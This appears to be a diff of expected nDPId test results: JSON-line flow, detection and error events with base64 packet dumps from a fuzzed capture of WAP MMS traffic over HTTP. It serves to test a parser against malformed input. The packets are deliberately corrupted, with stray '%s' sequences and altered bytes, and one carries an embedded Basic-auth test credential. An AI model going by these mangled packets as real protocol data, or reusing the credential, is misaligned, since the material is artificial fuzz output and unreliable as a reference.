+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1031854546079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854546079,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMtAAEAGF8qsNAMNrBQDBQBQCC3KbXJb5PFjPFARuSw++AAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557802,"flow_last_seen":1031854557802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854557802,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1031854557802,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854557802,"pkt":"CAAgsl17AFCLk5N8CABFAAAsNUtAAIAGZ0asFAMFrBQDDQouAFDlQWz1AAAAAGACIADjNgAAAgQFtAAA"} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1031854557802,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854557802,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMxAAEAGF8WsFAMNrBQDBQBQCi7KxfhE5UFs9mASgyyW7gAAAgQFtA=="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1031854557802,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854557802,"pkt":"CAAgsl17AFCLk5N8CABFAAAoNktAAIAGZkqsFAMFrBQDDQouAFDlQWz2ysX4RVAQIjgPoAAAAgQFtAAA"} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854557802,"flow_last_seen":1031854557802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854557802,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}} 00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":91,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1031854557899} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":91,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1031854557803,"pkt":"AFCLk5N8kgAgsl2cCAAlcwAoxM5AAEAGF8esFAMNrBQDBQB+Ci7KxfhF5UF0EVAQgyynkAAA"} -00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02421{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854557975,"pkt":"AFCLk5N8CAAgsl17CABFAAXcxM9AAEAGEhKsFAMNrBRIBQBQCi7KxfhF5UF0EVAQg2xUTwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2Zds6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcJVpY2F0aU9uL3ZuZC53YXAubW1zLW1lQnNhZ2UNCkNvbnRlbnQtTGVuZ3RoOiA0MDAzDQpEYXRlOiBEaHUsIDEyI1NlcCAyMDAyIDE4OjEzOjU3IEdNVA0KDQqMhJgxODkzMDEAjZCLMTg5MzAwQGdlY2RzMi5tb2JpbGl0eWxhYi5uZXQAhQQ9gOeoiRmAKzQ5MTcyNjEwMTAwNC9UWVBFPVBMTU4Alys0OTE3MjYxMDEwMDQvVFlQRT1QTE1OAJZSRTogAIqAj4GGgJCAhBuziWFwcGxpY2F0aW9uL3NtaWwAijxBQUHJPgACF5sIFmF1ZGlvL89tcgCFTWVtb18yLmFtcgAjIUFNUgoEAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAEAAAAAAAAIAAAAAAABAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAEYMHXD3zV\/8IgwWAMBAJCE3zKTS6yvWim2AQAaW9MjVBAFq9g49AEG3NPa5xSPjJCwdiuBGBzXCVzANBaejQlAgQt3KzJjOxe+tzME8YEwHMjOLJPC9RhIk1GBGcB9hyMVB+ymov9JgQcc+TIiquQD7ex2a4EwPA8+J0C0fnQHsHIBAJrIB2IKQBtWLyT3gRGCgMIhBG3oPgxOIIEYApux4qh3leJmGFmBAPwbXU1e9R22GaS9AQACnMDejLvmEUFMqwEnXCQ+IVVpDVVYOcgBAMm+YOVuf\/qr8C7EASdBxxFjGX+HDtZYUwEHBnMGjW5n+PI4knwBBsK4SmqTS8eSRtrYAQiJjP5kk8lcwBI1AgEHAoP2II8axveMUxCBBwKU3dDqfCKT69HlgQcGbBpzQqeNOKNF6oEwAEga4ImSmqwxRZQBFAp8rg96cDaFckq\/gRlAdboXdDfSI5Fhs4Eygrc660OMDBW5HaEBBsHdhiinThEsf5noAQbGQJaMx0Ha8dBdkAEbgqMCaJz67tCjYyGBFYKElgduY8Vu4Zy7gQiCozpdU1ad0ULON4ERAcMeDUZFTuMPjUeBCQG2xs90aDTRIjGIgQiCgWIMmeabddj5oQEHBPho51DgcHKVONABDMmMbh6HE7Qii8JIgQxKT03NTDED6MOAHwEACa6M6Mfl1xY4Ih2BG4p2Zgatr88WCLapAQAJndLPeWwjkERZqQEHCkMM4JXinkRKYxyBCMyCApUNjcVUeFBtAQpCgn4gisK1K1VbUYEGQr9sTV75X6826qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":93,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1031854557802,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3279,"flow_avg_l4_payload_len":468,"midstream":0,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562320,"flow_last_seen":1031854562320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854562320,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1031854562320,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854562320,"pkt":"CAAgsl1rAFCLk5N8CABFAAAsPltAAIAGXkasFAMFrBQDDQovAFDlUj+sAAAAAGACIADqbQAAAgQFtAAA"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854562321,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxNJAAEAGF7+sFAMNrBQDBQBQCi\/K2yc15VI\/rWASgyyVHwAAAgQFtA=="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854562321,"pkt":"CAAgsl17AFCLk5N8CABFIAAoP0tAAIAGXUqsFAMFrBQDDQovAFDlUj+tytsnNlAQIjgN0QAAAgQFtAAA"} -00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854562321,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02421{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854562321,"pkt":"CAAgsl17ACVzAJN8CABFAAXcQEtAAIAGVpasFAMFrBQDDSVzAFDlUj+tytsnNlAQInStCAAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvES4xDQpIbnN0OiAxNzIuMjAuMy4xMw0KT3B0OiAiaHR0cDovL3d3dy53My5vcmcvMTk5OS8wNi8yNC1DQ1BQZXhjaGFuZ2UiOyBucz01Ng0KQ29sdGVudC1UeXBlOiBhcHBsaWNhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpBY2NlcHQ6INtwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuDQpVc2VyLEFnZW50OiBTb255RXJpY3Nzb25UNjgvUjIwMUENCEFjY2VwdC1DaGFyc2V0OiAqDQo1Ni1Qcm9maWxlLURpZmYtMTogPD94bWwgdmVyc2lvbj0lcwAwIj8+PHpkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YSVzAHMjInhtbG5zOnByZj0iaHR0cDovL3d3VC53YXBmb291bS5vcmcvVUFQbk9GL2NjcHBzY2hlbWEtMTk5OTEwMTQjIj48IS0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IERlZmF1bHQgZGVzY3JpcHRpb34gb2YgcHJvcGVydGllcyAtLT48cmRmOkRlc2NyaXB0aW9uPjxwcmY6Q2NwcEFjY2VwdD48cmRmOkJhZz48cmRmOmxpPmFwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2U8L3JkZjpsaT48L3JkRzpCYWc+PC9wcmY6Q2NwcEFjY2VwdD5XL3JkZjpEZXNjcmlwdGlvbj48L3JkZjpSREY+DQo1Ni1Qcm9maWxlLURpZmYtMjogPD94bWwgdmVyc2lvbj0iMS4wIj8+PHJkZjpSREYgcG18bnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjInhtbLVzOnByZj0iaHR0cDovL3d3dy53YXBmb3J1bS5vcmcvVUFQUk9GL2NjcHBzY2hlbWEtMTk5OTEwMDQjIj48IS0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IERlZmF1bHQgZGVzY3JpcHRpb24gb2YgcHJvcGVydGllcyAtLT58ckhmOkRlc2NyaXB0aW9uPjxwcmY6Q2NwcEFjY2VwdC1DaGFyc2V0PjxyZGY6QmFnPjxyZGY6bGk+KjwvcmRmOmxpPjwvcmRmOkJhZz48L3ByZjpDY3BwQWNjZXB0LUNoYXJzZXQ+PC9yZGY6RGVzY3JpcHRpb24+PC9yZGY6UkRGPg0KNTYtUHJvZmlsZS1EaWZmLTM6IDw\/eG1sIHZlcnNpb249IjEuMCI\/PjxyZGY6UkRGIHhtbG5zOnJkZj1MaHR0cDovL3d3dy53My5vcmcvMTk5OS8wMi8yMi1yZGYtc3ludGF4LW5zIyJ4bWxuczpwcmY9Imh0dHA6L9x3d3cud2FwZm9CdW0ub3JnL1VBUFJPRi9jY3Bwc2NoZW1hLTE5OTkxMDE0IyI+PCEtLSBicm93c2VyIHZlbmRvciBzaXRlOiBEZWZhdWx0IGRlc2NyaXB0aW9uIG9mIHByb3BlcnRpZXMxLS0+PHJkZk5EZXNjcmlwdGlvbj48cHJmOkNjcHBB9mNlcHQtTGFuZ3VhZ2U+PHJkZjpTZXE+PHJkZjpsaT5lbjwvcmRiOmxpPjwvcmRmOlNlcT48L3ByZjpDY3BwQWNjZXB0LUxhbmd1YWdlPjwvcmRmOkRlc2NyaXB0OG9uPjwvcmRmOlJERj4NCjU2LVByb2ZpbGUJICJodHRwOi8vd2FwLnNvbnllcmljc3Nvbm1vYmlsZS5jb20vVUFwcm9mL1Q2OFI="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854562321,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854562401,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1031854562401,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":39,"thread_ts_msec":1031854562401,"pkt":"AFCLk5N8CAAgsl17CABFAAA7xNRAAEAGFzKsFAINrBQDBQBQCi\/K2yc25VJHCFAYgyz\/yAAASFRUUC8xLjEgMjAwIE9LDQpTZXN2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0eW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCnRvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE4OjE2OjAyIEdNVA0KDQo="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1031854562488,"pkt":"AHWLk5N8CAAgsl17CABFAAAwxNVAAEAGF7isFAMNrBQDBc\/JAFDK5CpLAAAAAHACgyzcpwAAAQEEAgIEBbQ="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854562488,"pkt":"CAAgsl17AFCLk5N8CABFAAAsQ0tAAIAGWUasFAMFrBQjDQBQz5DlU6AgyuQqTGASIjjNHQAAAgQFtG4v"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854562488,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxNZAAEAGF7+sFAMNrBQDBc+QAFDK5CpM5VPMIVAQgyyD5gAA"} -00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1031854562489,"pkt":"AFCLkxN8CAAgsl17CABFAAFkZddAAEAGFoKsFAMNrBQDBc+QAFDK5CpN5VOgIVAYgyyj7gAAUE9TVCAvcHBnY3RybC9wcGdjb24lcwBsbG9naWMuZGxsIEhUVFAvZC4xDQpBdXRob3JpemF0aXhuOiBCYXNpYyBiRzFqWDNjNlZHVnpkREV5TXpRPQ0KQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvcmVsYXRlZDsgYm91bmRhcnk9Im1zZyVzAHRfMF8xMDM4XzEwMzE4NTQ1NjI0ODQiOyB0eXBlPSJhcHBsaWNhdGlvTi94bWwiDQpVc2VyLUFnZW50OiBNTVMtUmVsYXktRGVsaXZlcnlJbml0aWF0b3INCkFjY2VwdDogYXBwbGljYXRpb24veG1sDQpDb25uZWN0aW9uOiVzAGVwLWFsaXZlDQpIb3N0OiAxNzIuMjAuMy41DQpDb250ZW50LWxlbmd0aDogODAwDQoNGg=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1031854562488,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1031854562489,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562489,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"flow_min_l4_payload_len":800,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":800,"midstream":1,"thread_ts_msec":1031854562489,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.70.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":854,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":854,"pkt_l4_len":820,"thread_ts_msec":1031854562489,"pkt":"AFCLk5N8CAAgsl17CABFAANIxNhAAEAGFJ2sFAMNrEYDBc+QAFDK5CuI5VOgYVAYgyy9cwAALS1tc2dwYXJ0XzBfMTAzOF8xMDMxODU0NTYyNDg0DQpDb250s250LVR5cGU6IGFwcGxpY2F0em9uk3htbA0KDQo8P3htbCB2ZXJzaW9uPSIxLjAiPz4NCjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQVBGT1JVTS8vRFREIFBBUCAxLjAvL0VOIg0KICAgICAgICAgNmh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9wYXBfMS4wLmR0ZCI+DQo8cCBwPg0KICA8cHVzaC1tZXNzYWdlIHB1dmgtaWQ9IjE4OTMwMV8xMDMxODU0NTYyNDgyXzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm5lWSIgZGVsaXZlci1iZWZvcmUtdGltZXN0YW1wPSIyMDAyLTA5LTEyVDE5OjE0OjQ4SiIgcHBnLW5vdGlmeS1yZXF1ZXN0ZWQtdG89Imh0dHA6Ly8xNzIuMjAuMy4xMytzZXJ2bGV0cy9tbXMiPg0KICAgITxhZGRyZXNzIGFkZHJlc3MtdmFsdWU9IldBUFBVU0g9KzQ5MTcwNjEwMTAwNC9UWVBFPVBMTU5AMTcyLjIwLjMuNSI+PC9hZGRyZXNzPg0KIDIgIDxxdWFsaXR5LW9mLXNlcnZpY2UgcHJpb3JpdHk9Im1lZGl1bSIgZGVsaXZlcnktbWV0aG9kPSJ1bmNvbmZpcm1lZCI+PC9xdWFsaXR5LW9mLSVzAHZpY2U+DQogIDwvdnVzaC1tZXNzYWdlPg0KPC9wYXA+DQoNCi0tbXNncGFydF8wXzEwWDhfMTAzMTg1NDU2MjQ4NA0KQ29udGVudC1UeXBlOiBjcHBsaVdhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpYLWphcC1BcHBsaWNhdGlvbi1JZDogNA0KDR+Mho2QizE4OTMwMEBnZWNkczIubW9iaWxpdHlsYWIubmV0AJcrNDkxNzI2MTAxMDA0L1RZUEU9UExNTleFBD2A2eKVgQ0KLS1tc2dnYXJ0XzBfMTAzOF8xMDMxODU0NTYyNDg0LS0="} 